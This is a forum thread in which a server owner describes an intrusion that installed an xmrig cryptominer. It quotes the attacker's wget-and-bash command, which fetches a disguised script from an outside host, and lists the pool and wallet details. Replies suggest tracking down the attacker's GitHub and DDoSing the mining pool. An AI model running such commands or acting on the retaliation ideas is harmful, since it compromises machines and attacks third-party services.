找回密码
 立即注册
CeraNetworksBGVM服务器主机交流会员请立即修改密码Sharktech防护
查看: 129|回复: 3

利用xmrig挖矿的狗 逼能不能治一治它?

[复制链接]

8

主题

1582

回帖

3890

积分

论坛元老

积分
3890
发表于 2020-11-25 03:32:28 | 显示全部楼层 |阅读模式
本帖最后由 laogui 于 2020-11-25 03:35 编辑

RT
有一台吃灰的阿里云机,被人入侵了,利用xmrig挖矿
幸亏阿里云有提醒
这狗 逼执行的命令代码:
[ol]
  • wget http://iems.net.cn/file/4.jpg -O /tmp/4.sh && bash /tmp/4.sh 123[/ol]复制代码[ol]
  • wget http://iems.net.cn/file/config.jpg -O /root/moneroocean/config.json[/ol]复制代码
    看了shell脚本和config.json文件,得到以下内容
    矿池:gulf.moneroocean.stream
    账号:48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF
    密码:123





    有没有办法治一治这种狗 逼的?



  • 本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?立即注册

    ×
    回复

    使用道具 举报

    12

    主题

    1072

    回帖

    2428

    积分

    金牌会员

    积分
    2428
    发表于 2020-11-25 04:30:25 | 显示全部楼层
    不知道,不太懂挖矿
    回复

    使用道具 举报

    6

    主题

    59

    回帖

    226

    积分

    中级会员

    积分
    226
    发表于 2020-11-25 04:38:16 | 显示全部楼层
    社工他github地址呗
    回复

    使用道具 举报

    216

    主题

    364

    回帖

    1932

    积分

    金牌会员

    积分
    1932
    发表于 2020-11-25 05:05:20 | 显示全部楼层
    这个真治不了。。。除了你能追溯到他个人电脑了!

    这玩意,矿池是公开的,钱包公钥你知道没卵用,也不知道谁的!

    直接D他矿池吧,D死矿池,就出不来块,LOC大神多!
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Archiver|手机版|小黑屋|HS2V主机综合交流论坛

    GMT+8, 2024-11-18 07:38 , Processed in 0.054405 second(s), 4 queries , Gzip On, Redis On.

    Powered by Discuz! X3.5

    © 2001-2024 Discuz! Team.

    快速回复 返回顶部 返回列表